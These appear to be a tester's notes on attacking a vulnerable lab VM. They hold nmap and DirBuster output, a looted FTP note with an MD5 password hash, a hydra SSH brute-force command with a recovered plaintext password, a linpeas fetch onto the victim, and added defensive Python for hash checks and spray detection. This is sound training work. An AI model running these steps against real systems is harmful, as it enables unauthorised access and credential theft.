Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 17:44 EDT
Nmap scan report for 10.0.2.6
Host is up (0.062s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:5D:4C:44 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.25 seconds
nmap -T4 -p- -A 10.0.2.6:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 17:36 EDT
Nmap scan report for 10.0.2.6
Host is up (0.093s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.0.2.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
|   256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_  256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:5D:4C:44 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   92.68 ms 10.0.2.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.35 seconds
dir fuzzing results:
dirbuster results:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Mar 20 10:38:33 EDT 2025
--------------------------------

http://10.0.2.6:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/academy/
/academy/assets/js/
/academy/assets/
/academy/admin/
/academy/assets/css/
/academy/assets/fonts/
/academy/assets/img/
/academy/admin/assets/
/academy/admin/assets/js/
/academy/admin/assets/css/
/academy/admin/assets/fonts/
/academy/admin/assets/img/
/academy/includes/
/academy/db/
/academy/admin/includes/
/phpmyadmin/

Dirs found with a 403 response:

/icons/
/icons/small/
/phpmyadmin/templates/
/phpmyadmin/themes/
/phpmyadmin/doc/
/phpmyadmin/doc/html/
/phpmyadmin/examples/
/phpmyadmin/js/
/phpmyadmin/libraries/
/phpmyadmin/vendor/
/phpmyadmin/doc/html/_images/
/phpmyadmin/vendor/google/
/phpmyadmin/js/vendor/
/phpmyadmin/setup/lib/
/phpmyadmin/sql/
/phpmyadmin/themes/original/
/phpmyadmin/themes/original/img/
/phpmyadmin/themes/original/css/

Dirs found with a 401 response:

/phpmyadmin/setup/

--------------------------------
Files found during testing:

Files found with a 301 responce:

/icons/small
/academy/assets/img
/academy/admin
/academy/assets
/academy/admin/assets
/academy
/academy/admin/assets/img
/academy/includes
/academy/assets/css
/academy/admin/includes
/academy/db
/academy/admin/assets/css
/academy/assets/js
/academy/admin/assets/js
/academy/assets/fonts
/academy/admin/assets/fonts
/phpmyadmin/themes
/phpmyadmin
/phpmyadmin/doc
/phpmyadmin/doc/html
/phpmyadmin/examples
/phpmyadmin/js
/phpmyadmin/doc/html/_images
/phpmyadmin/vendor
/phpmyadmin/vendor/google
/phpmyadmin/js/vendor
/phpmyadmin/sql
/phpmyadmin/themes/original
/phpmyadmin/themes/original/img
/phpmyadmin/themes/original/css

Files found with a 200 responce:

/icons/README
/academy/index.php
/academy/assets/js/bootstrap.js
/academy/assets/js/jquery-1.11.1.js
/academy/admin/index.php
/academy/assets/fonts/FontAwesome.otf
/academy/assets/css/bootstrap.css
/academy/assets/css/style.css
/academy/admin/assets/js/bootstrap.js
/academy/assets/fonts/fontawesome-webfont.eot
/academy/admin/assets/js/jquery-1.11.1.js
/academy/assets/css/font-awesome.css
/academy/admin/assets/css/bootstrap.css
/academy/assets/fonts/fontawesome-webfont.svg
/academy/admin/assets/css/style.css
/academy/assets/fonts/fontawesome-webfont.woff
/academy/admin/assets/fonts/FontAwesome.otf
/academy/assets/fonts/fontawesome-webfont.ttf
/academy/admin/assets/fonts/fontawesome-webfont.eot
/academy/assets/fonts/fontawesome-webfont.woff2
/academy/assets/fonts/glyphicons-halflings-regular.eot
/academy/assets/fonts/glyphicons-halflings-regular.svg
/academy/admin/assets/fonts/fontawesome-webfont.ttf
/academy/admin/assets/fonts/fontawesome-webfont.svg
/academy/admin/assets/fonts/fontawesome-webfont.woff
/academy/admin/assets/fonts/glyphicons-halflings-regular.eot
/academy/assets/fonts/glyphicons-halflings-regular.woff
/academy/assets/fonts/glyphicons-halflings-regular.woff2
/academy/admin/assets/fonts/glyphicons-halflings-regular.woff
/academy/admin/assets/fonts/glyphicons-halflings-regular.svg
/academy/admin/assets/fonts/glyphicons-halflings-regular.woff2
/academy/assets/fonts/glyphicons-halflings-regular.ttf
/academy/admin/assets/css/font-awesome.css
/academy/includes/config.php
/academy/includes/footer.php
/academy/includes/menubar.php
/academy/includes/header.php
/academy/admin/assets/fonts/glyphicons-halflings-regular.ttf
/academy/admin/assets/fonts/fontawesome-webfont.woff2
/academy/db/onlinecourse.sql
/academy/admin/includes/config.php
/academy/admin/includes/footer.php
/academy/admin/includes/header.php
/academy/admin/includes/menubar.php
/academy/logout.php
/academy/admin/logout.php
/phpmyadmin/index.php
/phpmyadmin/themes.php
/phpmyadmin/ajax.php
/phpmyadmin/navigation.php
/phpmyadmin/license.php
/phpmyadmin/README
/phpmyadmin/logout.php
/phpmyadmin/changelog.php
/phpmyadmin/export.php
/phpmyadmin/ChangeLog
/phpmyadmin/js/messages.php
/phpmyadmin/sql.php
/phpmyadmin/LICENSE

Files found with a 302 responce:

/academy/print.php
/academy/admin/print.php
/academy/admin/course.php
/academy/admin/department.php
/phpmyadmin/url.php
/academy/enroll.php
/academy/admin/session.php

Files found with a 403 responce:

/phpmyadmin/templates
/phpmyadmin/libraries
/phpmyadmin/setup/lib

Files found with a 401 responce:

/phpmyadmin/setup

--------------------------------
directory notes:
http://10.0.2.6/academy/admin/ seems to have default admin:admin credentials tf
http://10.0.2.6/academy/index.php seems interesting. need student creds to login. will have to find that elsewhere I think. imma try enumming ftp next
http://10.0.2.6/phpmyadmin/index.php might wanna try SQLi. simple payloads didn't work tho
ftp files:
note.txt:
Hello Heath!

Grimmie has set up the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.

I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:

INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');

The StudentRegno number is what you use for login.

Let me know what you think of this open-source project, it's from 2020 so it should be secure... right?
We can always adapt it to our needs.

-jdelta
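The INSERT in that note stores the student's password as a bare 32-hex digest, which is the shape of an unsalted MD5 and is the real finding here. As an added example (not code from the box, the app, or these notes), a small parser for that statement that flags such columns, next to the salted PBKDF2 storage the app should have used; parse_insert, weak_password_columns, hash_password and verify_password are my own names.

```python
import hashlib
import hmac
import os
import re

# Copy of the INSERT statement quoted in note.txt above.
NOTE_INSERT = (
    "INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, "
    "`studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, "
    "`creationdate`, `updationDate`) VALUES('10201321', '', "
    "'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', "
    "'7.60', '2021-05-29 14:36:56', '');"
)

BARE_32_HEX = re.compile(r"^[0-9a-f]{32}$")  # unsalted MD5 / NTLM shape
PBKDF2_ITERATIONS = 600_000                 # current OWASP figure for PBKDF2-HMAC-SHA256


def parse_insert(stmt):
    """Return {column: value} for a single-row INSERT ... VALUES(...) statement."""
    m = re.search(r"\(([^)]*)\)\s*VALUES\s*\((.*)\)\s*;?\s*$", stmt, re.S)
    if not m:
        raise ValueError("not a single-row INSERT")
    cols = re.findall(r"`([^`]+)`", m.group(1))
    vals = re.findall(r"'((?:[^'\\]|\\.)*)'", m.group(2))
    if len(cols) != len(vals):
        raise ValueError("column/value count mismatch")
    return dict(zip(cols, vals))


def weak_password_columns(row):
    """Columns whose value looks like a bare 32-hex digest (no salt, no scheme tag)."""
    return [c for c, v in row.items() if BARE_32_HEX.match(v)]


def hash_password(password, salt=None):
    """Salted PBKDF2 in the self-describing form pbkdf2_sha256$<iter>$<salt>$<digest>."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme: %s" % scheme)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)
```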
we got access as user www-data. will try to see if any priv escalation is possible with peass
process:
make a python server where the peass file is stored (see python server creation) and wget the file in the victim machine. tried it in the root dir but it didn't work. worked in the tmp directory though
give the linpeas file execution perm and run it. preferably save the output in a file
will try to ssh bruteforce using the 4 usernames we already have with hydra:
┌──(root㉿kali)-[~/Desktop/projects/academy]
└─# hydra -L users.txt -p My_V3ryS3cur3_P4ss 10.0.2.6 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 09:22:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking ssh://10.0.2.6:22/
[22][ssh] host: 10.0.2.6   login: grimmie   password: My_V3ryS3cur3_P4ss
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 09:22:43
so the password is for grimmie
grimmie:My_V3ryS3cur3_P4ss
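From the defender's side, the hydra run above leaves a very recognizable trace on the target: one source trying several different usernames within seconds, then an accepted login. Added example, not part of these notes or the box; the auth.log lines are constructed (usernames beyond grimmie, PIDs and ports are made up) and parse_auth_log / detect_spray are my own names.

```python
import re
from datetime import datetime

# Constructed Debian auth.log excerpt shaped like what the run above would leave.
SAMPLE_AUTH_LOG = """\
Mar 21 09:22:28 academy sshd[2101]: Failed password for invalid user heath from 10.0.2.5 port 51410 ssh2
Mar 21 09:22:29 academy sshd[2103]: Failed password for invalid user jdelta from 10.0.2.5 port 51412 ssh2
Mar 21 09:22:31 academy sshd[2105]: Failed password for invalid user rumham from 10.0.2.5 port 51414 ssh2
Mar 21 09:22:43 academy sshd[2107]: Accepted password for grimmie from 10.0.2.5 port 51416 ssh2
Mar 21 10:05:12 academy sshd[2290]: Failed password for grimmie from 10.0.2.9 port 40022 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2"
)


def parse_auth_log(text, year=2025):
    """Yield (timestamp, src_ip, username, accepted) for each sshd password event.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_spray(events, window_s=60, min_users=3):
    """Flag a source that tries >= min_users distinct logins within window_s seconds.
    The alert records which of those logins, if any, was accepted: a password
    spray that ends in an Accepted line is the case worth paging on."""
    alerts = []
    by_src = {}
    for ev in sorted(events):
        by_src.setdefault(ev[1], []).append(ev)
    for src, evs in by_src.items():
        for i, (t0, _, _, _) in enumerate(evs):
            burst = [e for e in evs[i:] if (e[0] - t0).total_seconds() <= window_s]
            users = sorted({e[2] for e in burst})
            if len(users) >= min_users:
                alerts.append({"src": src, "start": t0, "users": users,
                               "accepted": [e[2] for e in burst if e[3]]})
                break  # one alert per source is enough
    return alerts
```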
wait let's see if we can login to http://10.0.2.6/phpmyadmin/index.php with these creds
WE SURE CAN
gonna ssh into the server as grimmie now. let's see what privileges he has
grimmie@academy:~$ groups
administrator cdrom floppy audio dip video plugdev netdev
hmmm seems like grimmie is an admin. also has a backup.sh file in his home directory. let's see what it does